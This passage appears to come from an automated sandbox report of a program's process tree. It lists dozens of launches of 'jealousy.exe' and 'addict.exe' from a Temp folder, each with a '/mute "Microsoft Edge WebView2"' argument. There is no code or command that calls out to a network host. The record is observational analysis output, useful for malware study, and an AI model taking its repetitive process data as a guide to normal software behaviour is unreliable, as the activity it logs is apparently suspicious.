        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1808
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5156
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3256
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8016
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7696
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3628
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7164
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8080
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6816
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7184
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8060
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6324
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7876
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2776
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7884
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6020
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7888
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8388
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8912
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8760
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9036
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9640
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9312
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6140
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:528
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:816
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7476
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5744
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7320
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8364
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8764
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9048
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9908
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1648
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10040
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5048
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:404
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7928
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7428
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7432
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7920
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6536
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1400
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8340
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9456
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3776
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6336
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9972
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5184
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7816
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9476
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7696
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4428
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6120
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6940
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8376
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8660
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8688
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8972
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9308
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3500
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9352
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5868
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3940
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6208
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6452
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7360
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6580
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8520
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6304
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1400
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3292
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1164
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9944
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10088
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9956
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4088
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6984
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4412
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6004
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7912
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6840
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6200
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5264
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1300
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:556
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9500
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8136
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7816
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8716
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:932
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6444
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8156
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7404
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7948
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6344
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7004
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8648
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8740
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9376
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7520
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8452
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9488
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9088
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8012
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9380
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7688
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3008
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7928
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8204
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5980
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5896
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8596
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3204
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5468
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
